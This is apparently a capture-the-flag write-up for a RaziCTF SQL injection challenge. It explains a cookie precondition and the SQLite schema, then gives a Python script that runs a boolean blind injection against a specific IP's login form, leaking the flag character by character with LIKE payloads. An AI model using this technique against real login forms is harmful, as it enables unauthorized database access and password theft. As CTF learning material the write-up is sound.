Rating:
this is an sql injection challenge, however one must change the cookie to hex representation of string True, before we can do the sql injection. Otherwise the request will be ignored, from fuzzing we know that db is sqlite3, and that means all schema are safed at sqlite_master, we leak them one character at a time using the information reflected if login is successful or not, we found that there are users table and password column, we leak the password to get the flag
```
import requests
cookies = {
'416c6c6f77': '54727565',
}
headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'Origin': 'http://130.185.122.155:8080',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Referer': 'http://130.185.122.155:8080/',
'Accept-Language': 'en-US,en;q=0.9,id;q=0.8,fr;q=0.7',
}
import string
yo = string.printable.replace("%", '')
print(yo)
now = 'create_table_users'
now = 'RaziCTF{!snt_bl'
while True:
for i in yo:
data = {
'uname': "1'or/**/(select (select group_concat(password) from users) LIKE '"+now+i+"%')-- -",
'psw': 'a'
}
response = requests.post('http://130.185.122.155:8080/login', headers=headers, cookies=cookies, data=data, verify=False)
if 'did' in response.content:
now = now + i
print(now)
break
print "HELLO"
```